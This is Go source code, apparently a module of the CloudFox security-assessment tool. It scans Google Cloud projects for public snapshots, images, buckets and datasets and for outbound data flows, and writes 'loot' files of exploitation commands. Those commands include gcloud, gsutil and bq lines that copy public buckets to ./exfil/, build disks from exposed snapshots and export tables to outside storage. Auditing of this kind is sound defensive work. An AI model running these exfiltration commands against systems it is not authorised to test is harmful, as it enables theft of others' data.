(%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Service)) + 
			sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description))

			for _, p := range relevantPrincipals {
				// Service accounts carry their own project; users/groups do not,
				// so they fall back to the project being assessed.
				project := extractProjectFromPrincipal(p.Principal, m.OrgCache)
				if project == "" {
					project = projectID // Use the target project for users/groups
				}

				principalType := p.MemberType
				if principalType == "" {
					if p.IsServiceAccount {
						principalType = "serviceAccount"
					} else {
						principalType = "user"
					}
				}

				sb.WriteString(fmt.Sprintf("## %s (%s)\n", p.Principal, principalType))

				// Add impersonation command if it's a service account
				if p.IsServiceAccount {
					sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal))
				}

				// Add the exploitation command
				cmd := getExploitCommand(finding.Permission, p.Principal, project)
				sb.WriteString(cmd)
				sb.WriteString("\n\n")

				// Reset impersonation note
				if p.IsServiceAccount {
					sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n")
				}
			}
		}
	}

	contents := sb.String()
	// Don't return empty loot file: if nothing was appended, the builder still
	// equals the bare header written at the top of this function.
	if contents == fmt.Sprintf("# GCP Data Exfiltration Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) {
		return nil
	}

	return &internal.LootFile{
		Name:     "data-exfiltration-commands",
		Contents: contents,
	}
}

// processProject runs every misconfiguration finder against a single project.
// Called once per project by RunProjectEnumeration; each finder does its own
// locking, so only the loot initialization is guarded here.
func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME)
	}

	m.mu.Lock()
	m.initializeLootForProject(projectID)
	m.mu.Unlock()

	// === ACTUAL MISCONFIGURATIONS ===

	// 1. Find public/shared snapshots
	m.findPublicSnapshots(ctx, projectID, logger)

	// 2. Find public/shared images
	m.findPublicImages(ctx, projectID, logger)

	// 3. Find public buckets
	m.findPublicBuckets(ctx, projectID, logger)

	// 4. Find cross-project logging sinks
	m.findCrossProjectLoggingSinks(ctx, projectID, logger)

	// 5. Find Pub/Sub push subscriptions to external endpoints
	m.findPubSubPushEndpoints(ctx, projectID, logger)

	// 6. Find Pub/Sub subscriptions exporting to external destinations
	m.findPubSubExportSubscriptions(ctx, projectID, logger)

	// 7. Find BigQuery datasets with public access
	m.findPublicBigQueryDatasets(ctx, projectID, logger)

	// 8. Find Cloud SQL with export enabled
	m.findCloudSQLExportConfig(ctx, projectID, logger)

	// 9. Find Storage Transfer jobs to external destinations
	m.findStorageTransferJobs(ctx, projectID, logger)
}

// findPublicSnapshots finds snapshots that are publicly accessible
func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) {
	computeService, err := compute.NewService(ctx)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not create Compute service in project %s", projectID))
		return
	}

	req := computeService.Snapshots.List(projectID)
	err = req.Pages(ctx, func(page *compute.SnapshotList) error {
		for _, snapshot := range page.Items {
			// Per-snapshot IAM fetch; errors (e.g. permission denied on one
			// snapshot) are skipped so the page walk continues.
			policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do()
			if err != nil {
				continue
			}

			// allUsers outranks allAuthenticatedUsers if both appear.
			accessLevel := ""
			for _, binding := range policy.Bindings {
				for _, member := range binding.Members {
					if shared.IsPublicPrincipal(member) {
						if member == "allUsers" {
							accessLevel = "allUsers"
							break
						}
						if accessLevel != "allUsers" {
							accessLevel = "allAuthenticatedUsers"
						}
					}
				}
			}

			if accessLevel != "" {
				export := PublicExport{
					ResourceType: "Disk Snapshot",
					ResourceName: snapshot.Name,
					ProjectID:    projectID,
					AccessLevel:  accessLevel,
					DataType:     "disk_snapshot",
					Size:         fmt.Sprintf("%d GB", snapshot.DiskSizeGb),
					RiskLevel:    "CRITICAL",
				}

				path := ExfiltrationPath{
					PathType:     "Public Snapshot",
					ResourceName: snapshot.Name,
					ProjectID:    projectID,
					Description:  fmt.Sprintf("Disk snapshot (%d GB) accessible to %s", snapshot.DiskSizeGb, accessLevel),
					Destination:  "Anyone with access level: " + accessLevel,
					RiskLevel:    "CRITICAL",
					RiskReasons:  []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"},
					ExploitCommand: fmt.Sprintf(
						"# Create disk from public snapshot\n"+
							"gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a",
						projectID, snapshot.Name),
				}

				m.mu.Lock()
				m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export)
				m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
				m.addExfiltrationPathToLoot(projectID, path)
				m.mu.Unlock()
			}
		}
		return nil
	})

	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list snapshots in project %s", projectID))
	}
}

// findPublicImages finds images that are publicly accessible
func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) {
	computeService, err := compute.NewService(ctx)
	if err != nil {
		// NOTE(review): silent return here, unlike findPublicSnapshots which
		// logs the same Compute-service creation failure — presumably to avoid
		// reporting the identical error twice per project. Confirm intent.
		return
	}

	req := computeService.Images.List(projectID)
	err = req.Pages(ctx, func(page *compute.ImageList) error {
		for _, image := range page.Items {
			policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do()
			if err != nil {
				continue
			}

			// Same public-principal ranking as findPublicSnapshots.
			accessLevel := ""
			for _, binding := range policy.Bindings {
				for _, member := range binding.Members {
					if shared.IsPublicPrincipal(member) {
						if member == "allUsers" {
							accessLevel = "allUsers"
							break
						}
						if accessLevel != "allUsers" {
							accessLevel = "allAuthenticatedUsers"
						}
					}
				}
			}

			if accessLevel != "" {
				export := PublicExport{
					ResourceType: "VM Image",
					ResourceName: image.Name,
					ProjectID:    projectID,
					AccessLevel:  accessLevel,
					DataType:     "vm_image",
					Size:         fmt.Sprintf("%d GB", image.DiskSizeGb),
					RiskLevel:    "CRITICAL",
				}

				path := ExfiltrationPath{
					PathType:     "Public Image",
					ResourceName: image.Name,
					ProjectID:    projectID,
					Description:  fmt.Sprintf("VM image (%d GB) accessible to %s", image.DiskSizeGb, accessLevel),
					Destination:  "Anyone with access level: " + accessLevel,
					RiskLevel:    "CRITICAL",
					RiskReasons:  []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"},
					ExploitCommand: fmt.Sprintf(
						"# Create instance from public image\n"+
							"gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a",
						projectID, image.Name),
				}

				m.mu.Lock()
				m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export)
				m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
				m.addExfiltrationPathToLoot(projectID, path)
				m.mu.Unlock()
			}
		}
		return nil
	})

	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list images in project %s", projectID))
	}
}

// findPublicBuckets finds GCS buckets with public access
func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) {
	storageService, err := storage.NewService(ctx)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not create Storage service in project %s", projectID))
		return
	}

	resp, err := storageService.Buckets.List(projectID).Do()
	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list buckets in project %s", projectID))
		return
	}

	for _, bucket := range resp.Items {
		policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do()
		if err != nil {
			continue
		}

		// Same public-principal ranking as the snapshot/image finders.
		accessLevel := ""
		for _, binding := range policy.Bindings {
			for _, member := range binding.Members {
				if shared.IsPublicPrincipal(member) {
					if member == "allUsers" {
						accessLevel = "allUsers"
						break
					}
					if accessLevel != "allUsers" {
						accessLevel = "allAuthenticatedUsers"
					}
				}
			}
		}

		if accessLevel != "" {
			export := PublicExport{
				ResourceType: "Storage Bucket",
				ResourceName: bucket.Name,
				ProjectID:    projectID,
				AccessLevel:  accessLevel,
				DataType:     "gcs_bucket",
				RiskLevel:    "CRITICAL",
			}

			path := ExfiltrationPath{
				PathType:     "Public Bucket",
				ResourceName: bucket.Name,
				ProjectID:    projectID,
				Description:  fmt.Sprintf("GCS bucket accessible to %s", accessLevel),
				Destination:  "Anyone with access level: " + accessLevel,
				RiskLevel:    "CRITICAL",
				RiskReasons:  []string{"Bucket is publicly accessible", "May contain sensitive files"},
				ExploitCommand: fmt.Sprintf(
					"# List public bucket contents\n"+
						"gsutil ls -r gs://%s/\n"+
						"# Download all files\n"+
						"gsutil -m cp -r gs://%s/ ./exfil/",
					bucket.Name, bucket.Name),
			}

			m.mu.Lock()
			m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export)
			m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
			m.addExfiltrationPathToLoot(projectID, path)
			m.mu.Unlock()
		}
	}
}
// findCrossProjectLoggingSinks finds logging sinks that export to external destinations
func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) {
	ls := loggingservice.New()
	sinks, err := ls.Sinks(projectID)
	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list logging sinks in project %s", projectID))
		return
	}

	for _, sink := range sinks {
		if sink.Disabled {
			continue
		}

		if sink.IsCrossProject {
			// Pub/Sub destinations are downgraded: messages are transient,
			// unlike a bucket/dataset that accumulates log history.
			riskLevel := "HIGH"
			if sink.DestinationType == "pubsub" {
				riskLevel = "MEDIUM"
			}

			destDesc := fmt.Sprintf("%s in project %s", sink.DestinationType, sink.DestinationProject)

			path := ExfiltrationPath{
				PathType:     "Logging Sink",
				ResourceName: sink.Name,
				ProjectID:    projectID,
				Description:  fmt.Sprintf("Logs exported to %s", destDesc),
				Destination:  sink.Destination,
				RiskLevel:    riskLevel,
				RiskReasons:  []string{"Logs exported to different project", "May contain sensitive information in log entries"},
				ExploitCommand: fmt.Sprintf(
					"# View sink configuration\n"+
						"gcloud logging sinks describe %s --project=%s\n"+
						"# Check destination permissions\n"+
						"# Destination: %s",
					sink.Name, projectID, sink.Destination),
			}

			m.mu.Lock()
			m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
			m.addExfiltrationPathToLoot(projectID, path)
			m.mu.Unlock()
		}
	}
}

// findPubSubPushEndpoints finds Pub/Sub subscriptions pushing to external HTTP endpoints
func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, projectID string, logger internal.Logger) {
	ps := pubsubservice.New()
	subs, err := ps.Subscriptions(projectID)
	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list Pub/Sub subscriptions in project %s", projectID))
		return
	}

	for _, sub := range subs {
		if sub.PushEndpoint == "" {
			continue
		}

		// Endpoints on Google-managed domains are considered internal;
		// anything else is assumed potentially attacker-controlled.
		endpoint := sub.PushEndpoint
		isExternal := true
		if strings.Contains(endpoint, ".run.app") ||
			strings.Contains(endpoint, ".cloudfunctions.net") ||
			strings.Contains(endpoint, "appspot.com") ||
			strings.Contains(endpoint, "googleapis.com") {
			isExternal = false
		}

		if isExternal {
			riskLevel := "HIGH"

			path := ExfiltrationPath{
				PathType:     "Pub/Sub Push",
				ResourceName: sub.Name,
				ProjectID:    projectID,
				Description:  "Subscription pushes messages to external endpoint",
				Destination:  endpoint,
				RiskLevel:    riskLevel,
				RiskReasons:  []string{"Messages pushed to external HTTP endpoint", "Endpoint may be attacker-controlled"},
				ExploitCommand: fmt.Sprintf(
					"# View subscription configuration\n"+
						"gcloud pubsub subscriptions describe %s --project=%s\n"+
						"# Test endpoint\n"+
						"curl -v %s",
					sub.Name, projectID, endpoint),
			}

			m.mu.Lock()
			m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
			m.addExfiltrationPathToLoot(projectID, path)
			m.mu.Unlock()
		}
	}
}

// findPubSubExportSubscriptions finds Pub/Sub subscriptions exporting to BigQuery or GCS
func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Context, projectID string, logger internal.Logger) {
	ps := pubsubservice.New()
	subs, err := ps.Subscriptions(projectID)
	if err != nil {
		// Silent return: findPubSubPushEndpoints already reports this same
		// listing failure — presumably intentional de-duplication.
		return
	}

	for _, sub := range subs {
		if sub.BigQueryTable != "" {
			// BigQueryTable looks like "project.dataset.table"; only the
			// project component matters for the cross-project check.
			parts := strings.Split(sub.BigQueryTable, ".")
			if len(parts) >= 1 {
				destProject := parts[0]
				if destProject != projectID {
					path := ExfiltrationPath{
						PathType:     "Pub/Sub BigQuery Export",
						ResourceName: sub.Name,
						ProjectID:    projectID,
						Description:  "Subscription exports messages to BigQuery in different project",
						Destination:  sub.BigQueryTable,
						RiskLevel:    "MEDIUM",
						RiskReasons:  []string{"Messages exported to different project", "Data flows outside source project"},
						ExploitCommand: fmt.Sprintf(
							"gcloud pubsub subscriptions describe %s --project=%s",
							sub.Name, projectID),
					}

					m.mu.Lock()
					m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
					m.addExfiltrationPathToLoot(projectID, path)
					m.mu.Unlock()
				}
			}
		}

		if sub.CloudStorageBucket != "" {
			path := ExfiltrationPath{
				PathType:     "Pub/Sub GCS Export",
				ResourceName: sub.Name,
				ProjectID:    projectID,
				Description:  "Subscription exports messages to Cloud Storage bucket",
				Destination:  "gs://" + sub.CloudStorageBucket,
				RiskLevel:    "MEDIUM",
				RiskReasons:  []string{"Messages exported to Cloud Storage", "Bucket may be accessible externally"},
				ExploitCommand: fmt.Sprintf(
					"gcloud pubsub subscriptions describe %s --project=%s\n"+
						"gsutil ls gs://%s/",
					sub.Name, projectID, sub.CloudStorageBucket),
			}

			m.mu.Lock()
			m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
			m.addExfiltrationPathToLoot(projectID, path)
			m.mu.Unlock()
		}
	}
}

// findPublicBigQueryDatasets finds BigQuery datasets with public IAM bindings
func (m *DataExfiltrationModule) findPublicBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) {
	bq := bigqueryservice.New()
	datasets, err := bq.BigqueryDatasets(projectID)
	if err != nil {
		gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME,
			fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID))
		return
	}

	for _, dataset := range datasets {
		if dataset.IsPublic {
			export := PublicExport{
				ResourceType: "BigQuery Dataset",
				ResourceName: dataset.DatasetID,
				ProjectID:    projectID,
				AccessLevel:  dataset.PublicAccess,
				DataType:     "bigquery_dataset",
				RiskLevel:    "CRITICAL",
			}

			path := ExfiltrationPath{
				PathType:     "Public BigQuery",
				ResourceName: dataset.DatasetID,
				ProjectID:    projectID,
				Description:  fmt.Sprintf("BigQuery dataset accessible to %s", dataset.PublicAccess),
				Destination:  "Anyone with access level: " + dataset.PublicAccess,
				RiskLevel:    "CRITICAL",
				RiskReasons:  []string{"Dataset is publicly accessible", "Data can be queried by anyone"},
				ExploitCommand: fmt.Sprintf(
					"# Query public dataset\n"+
						"bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.INFORMATION_SCHEMA.TABLES`'\n"+
						"# Export data\n"+
						"bq extract --destination_format=CSV '%s.%s.TABLE_NAME' gs://your-bucket/export.csv",
					projectID, dataset.DatasetID, projectID, dataset.DatasetID),
			}

			m.mu.Lock()
			m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export)
			m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path)
			m.addExfiltrationPathToLoot(projectID, path)
			m.mu.Unlock()
		}
	}
}
m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } +} + +// findCloudSQLExportConfig finds Cloud SQL instances with export configurations +func (m *DataExfiltrationModule) findCloudSQLExportConfig(ctx context.Context, projectID string, logger internal.Logger) { + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + return + } + + resp, err := sqlService.Instances.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range resp.Items { + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backup := instance.Settings.BackupConfiguration + if backup.Enabled && backup.BinaryLogEnabled { + path := ExfiltrationPath{ + PathType: "Cloud SQL Export", + ResourceName: instance.Name, + ProjectID: projectID, + Description: "Cloud SQL instance with binary logging enabled (enables CDC export)", + Destination: "External via mysqldump/pg_dump or CDC", + RiskLevel: "LOW", + RiskReasons: []string{"Binary logging enables change data capture", "Data can be exported if IAM allows"}, + ExploitCommand: fmt.Sprintf( + "# Check export permissions\n"+ + "gcloud sql instances describe %s --project=%s\n"+ + "# Export if permitted\n"+ + "gcloud sql export sql %s gs://bucket/export.sql --database=mydb", + instance.Name, projectID, instance.Name), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + } +} + +// findStorageTransferJobs finds Storage Transfer Service jobs to external destinations +func (m *DataExfiltrationModule) findStorageTransferJobs(ctx 
context.Context, projectID string, logger internal.Logger) { + stsService, err := storagetransfer.NewService(ctx) + if err != nil { + return + } + + filter := fmt.Sprintf(`{"projectId":"%s"}`, projectID) + req := stsService.TransferJobs.List(filter) + err = req.Pages(ctx, func(page *storagetransfer.ListTransferJobsResponse) error { + for _, job := range page.TransferJobs { + if job.Status != "ENABLED" { + continue + } + + var destination string + var destType string + var isExternal bool + + if job.TransferSpec != nil { + if job.TransferSpec.AwsS3DataSource != nil { + destination = fmt.Sprintf("s3://%s", job.TransferSpec.AwsS3DataSource.BucketName) + destType = "AWS S3" + isExternal = true + } + if job.TransferSpec.AzureBlobStorageDataSource != nil { + destination = fmt.Sprintf("azure://%s/%s", + job.TransferSpec.AzureBlobStorageDataSource.StorageAccount, + job.TransferSpec.AzureBlobStorageDataSource.Container) + destType = "Azure Blob" + isExternal = true + } + if job.TransferSpec.HttpDataSource != nil { + destination = job.TransferSpec.HttpDataSource.ListUrl + destType = "HTTP" + isExternal = true + } + } + + if isExternal { + path := ExfiltrationPath{ + PathType: "Storage Transfer", + ResourceName: job.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Transfer job to %s", destType), + Destination: destination, + RiskLevel: "HIGH", + RiskReasons: []string{"Data transferred to external cloud provider", "Destination outside GCP control"}, + ExploitCommand: fmt.Sprintf( + "# View transfer job\n"+ + "gcloud transfer jobs describe %s", + job.Name), + } + + m.mu.Lock() + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list Storage Transfer jobs for project %s", projectID)) + } +} + +// 
// ------------------------------
// Loot File Management
// ------------------------------

// addExfiltrationPathToLoot appends a path's exploit command to the project's
// loot file. Callers hold m.mu, so no locking happens here.
func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, path ExfiltrationPath) {
	if path.ExploitCommand == "" {
		return
	}

	lootFile := m.LootMap[projectID]["data-exfiltration-commands"]
	if lootFile == nil {
		return
	}

	lootFile.Contents += fmt.Sprintf(
		"# =============================================================================\n"+
			"# [ACTUAL] %s: %s\n"+
			"# =============================================================================\n"+
			"# Project: %s\n"+
			"# Description: %s\n"+
			"# Destination: %s\n",
		path.PathType,
		path.ResourceName,
		path.ProjectID,
		path.Description,
		path.Destination,
	)

	lootFile.Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand)
}

// ------------------------------
// Output Generation
// ------------------------------

// writeOutput chooses hierarchical or flat rendering based on org hierarchy
// availability and the user's flat-output flag.
func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) {
	if m.Hierarchy != nil && !m.FlatOutput {
		m.writeHierarchicalOutput(ctx, logger)
	} else {
		m.writeFlatOutput(ctx, logger)
	}
}

// getMisconfigHeader returns the column headers for the misconfigurations table.
func (m *DataExfiltrationModule) getMisconfigHeader() []string {
	return []string{
		"Project",
		"Resource",
		"Type",
		"Destination",
		"Public",
		"Size",
	}
}

// getFoxMapperHeader returns the column headers for the permissions table.
func (m *DataExfiltrationModule) getFoxMapperHeader() []string {
	return []string{
		"Scope Type",
		"Scope ID",
		"Principal Type",
		"Principal",
		"Service",
		"Permission",
		"Description",
	}
}

// pathsToTableBody merges exfiltration paths with public exports into table
// rows; exports matching a path are folded into it, leftovers get own rows.
func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, exports []PublicExport) [][]string {
	var body [][]string

	publicResources := make(map[string]PublicExport)
	for _, e := range exports {
		key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName)
		publicResources[key] = e
	}

	for _, p := range paths {
		// NOTE(review): this key uses PathType (e.g. "Public Snapshot") while
		// the map above keys on ResourceType (e.g. "Disk Snapshot"), so the
		// lookup appears to never match — paths would always show Public=No and
		// every public export also gets its own row below. Confirm whether the
		// two type vocabularies were meant to line up.
		key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName)
		export, isPublic := publicResources[key]

		publicStatus := "No"
		size := "-"
		if isPublic {
			publicStatus = "Yes"
			size = export.Size
			delete(publicResources, key)
		}

		body = append(body, []string{
			m.GetProjectName(p.ProjectID),
			p.ResourceName,
			p.PathType,
			p.Destination,
			publicStatus,
			size,
		})
	}

	// Remaining exports had no matching path row; emit them standalone.
	for _, e := range publicResources {
		body = append(body, []string{
			m.GetProjectName(e.ProjectID),
			e.ResourceName,
			e.ResourceType,
			"Public access: " + e.AccessLevel,
			"Yes",
			e.Size,
		})
	}

	return body
}

// foxMapperFindingsForProject returns findings for a specific project
// Includes: SAs from that project + users/groups (which can access any project)
// Also filters by scope: only org/folder/project findings in the project's hierarchy
func (m *DataExfiltrationModule) foxMapperFindingsForProject(projectID string) [][]string {
	var body [][]string

	// Get ancestor folders and org for filtering
	var ancestorFolders []string
	var projectOrgID string
	if m.OrgCache != nil && m.OrgCache.IsPopulated() {
		ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID)
		projectOrgID = m.OrgCache.GetProjectOrgID(projectID)
	}
	ancestorFolderSet := make(map[string]bool)
	for _, f := range ancestorFolders {
		ancestorFolderSet[f] = true
	}

	for _, f := range m.FoxMapperFindings {
		for _, p := range f.Principals {
			principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache)

			// Include if: SA from this project OR user/group (no project - applies to all)
			if principalProject != projectID && principalProject != "" {
				continue
			}

			// Filter by scope hierarchy
			if !m.scopeMatchesProject(p.ScopeType, p.ScopeID, projectID, projectOrgID, ancestorFolderSet) {
				continue
			}

			// Determine principal type
			principalType := p.MemberType
			if principalType == "" {
				if p.IsServiceAccount {
					principalType = "serviceAccount"
				} else {
					principalType = "user"
				}
			}

			scopeType := p.ScopeType
			if scopeType == "" {
				scopeType = "-"
			}
			scopeID := p.ScopeID
			if scopeID == "" {
				scopeID = "-"
			}

			body = append(body, []string{
				scopeType,
				scopeID,
				principalType,
				p.Principal,
				f.Service,
				f.Permission,
				f.Description,
			})
		}
	}
	return body
}

// foxMapperFindingsWithoutProject returns findings for principals without a clear project
// (e.g., compute default SAs, users, groups)
func (m *DataExfiltrationModule) foxMapperFindingsWithoutProject() [][]string {
	var body [][]string
	for _, f := range m.FoxMapperFindings {
		for _, p := range f.Principals {
			// Extract project from principal
			principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache)

			// Only include if we couldn't determine the project
			if principalProject != "" {
				continue
			}

			// Determine principal type
			principalType := p.MemberType
			if principalType == "" {
				if p.IsServiceAccount {
					principalType = "serviceAccount"
				} else {
					principalType = "user"
				}
			}

			scopeType := p.ScopeType
			if scopeType == "" {
				scopeType = "-"
			}
			scopeID := p.ScopeID
			if scopeID == "" {
				scopeID = "-"
			}

			body = append(body, []string{
				scopeType,
				scopeID,
				principalType,
				p.Principal,
				f.Service,
				f.Permission,
				f.Description,
			})
		}
	}
	return body
}

// foxMapperFindingsToTableBodyForProject returns findings filtered by project
func (m *DataExfiltrationModule) foxMapperFindingsToTableBodyForProject(projectID string) [][]string {
	var body [][]string
	for _, f := range m.FoxMapperFindings {
		for _, p := range f.Principals {
			// Extract project from principal (uses existing function from privesc.go)
			principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache)

			// Only include if it matches this project
			if principalProject != projectID {
				continue
			}

			// Determine principal type
			principalType := p.MemberType
			if principalType == "" {
				if p.IsServiceAccount {
					principalType = "serviceAccount"
				} else {
					principalType = "user"
				}
			}

			scopeType := p.ScopeType
			if scopeType == "" {
				scopeType = "-"
			}

			// NOTE(review): the "Scope ID" column is filled with the
			// principal's project here (unlike the sibling builders, which use
			// p.ScopeID) — confirm this asymmetry is intentional.
			body = append(body, []string{
				scopeType,
				principalProject,
				principalType,
				p.Principal,
				f.Service,
				f.Permission,
				f.Description,
			})
		}
	}
	return body
}

// foxMapperFindingsToTableBody returns all findings (for flat output)
func (m *DataExfiltrationModule) foxMapperFindingsToTableBody() [][]string {
	var body [][]string
	for _, f := range m.FoxMapperFindings {
		for _, p := range f.Principals {
			// Determine principal type
			principalType := p.MemberType
			if principalType == "" {
				if p.IsServiceAccount {
					principalType = "serviceAccount"
				} else {
					principalType = "user"
				}
			}

			scopeType := p.ScopeType
			if scopeType == "" {
				scopeType = "-"
			}
			scopeID := p.ScopeID
			if scopeID == "" {
				scopeID = "-"
			}

			body = append(body, []string{
				scopeType,
				scopeID,
				principalType,
				p.Principal,
				f.Service,
				f.Permission,
				f.Description,
			})
		}
	}
	return body
}

// scopeMatchesProject checks if a scope (org/folder/project) is in the hierarchy for a project
func (m *DataExfiltrationModule) scopeMatchesProject(scopeType, scopeID, projectID, projectOrgID string, ancestorFolderSet map[string]bool) bool {
	if scopeType == "" || scopeID == "" {
		// No scope info - include by default
		return true
	}

	switch scopeType {
	case "project":
		return scopeID == projectID
	case "organization":
		if projectOrgID != "" {
			return scopeID == projectOrgID
		}
		// No org info - include by default
		return true
	case "folder":
		if len(ancestorFolderSet) > 0 {
			return ancestorFolderSet[scopeID]
		}
		// No folder info - include by default
		return true
	case "resource":
		// Resource-level - include by default
		return true
	default:
		return true
	}
}

// buildTablesForProject assembles the misconfigurations table for one project,
// omitting it entirely when there is nothing to report.
func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []internal.TableFile {
	var tableFiles []internal.TableFile

	paths := m.ProjectExfiltrationPaths[projectID]
	exports := m.ProjectPublicExports[projectID]

	if len(paths) > 0 || len(exports) > 0 {
		body := m.pathsToTableBody(paths, exports)
		if len(body) > 0 {
			tableFiles = append(tableFiles, internal.TableFile{
				Name:   "data-exfiltration-misconfigurations",
				Header: m.getMisconfigHeader(),
				Body:   body,
			})
		}
	}

	return tableFiles
}
// writeHierarchicalOutput renders per-project tables/loot grouped under the
// org/folder hierarchy. Used when hierarchy info is available and flat output
// was not requested.
func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) {
	outputData := internal.HierarchicalOutputData{
		OrgLevelData:     make(map[string]internal.CloudfoxOutput),
		FolderLevelData:  make(map[string]internal.CloudfoxOutput),
		ProjectLevelData: make(map[string]internal.CloudfoxOutput),
	}

	// Process each specified project (via -p or -l flags)
	for _, projectID := range m.ProjectIDs {
		m.initializeLootForProject(projectID)

		tableFiles := m.buildTablesForProject(projectID)

		// Add FoxMapper findings table for this project
		// Include SAs from this project + users/groups (which apply to all projects)
		foxMapperBody := m.foxMapperFindingsForProject(projectID)
		if len(foxMapperBody) > 0 {
			tableFiles = append(tableFiles, internal.TableFile{
				Name:   "data-exfiltration-permissions",
				Header: m.getFoxMapperHeader(),
				Body:   foxMapperBody,
			})
		}

		// Add loot files for this project; header-only files (nothing appended
		// past the authorization warning) are skipped.
		var lootFiles []internal.LootFile
		if projectLoot, ok := m.LootMap[projectID]; ok {
			for _, loot := range projectLoot {
				if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") {
					lootFiles = append(lootFiles, *loot)
				}
			}
		}

		// Add project-specific playbook
		playbook := m.generatePlaybookForProject(projectID)
		if playbook != nil && playbook.Contents != "" {
			lootFiles = append(lootFiles, *playbook)
		}

		// Always add all specified projects to output
		outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles}
	}

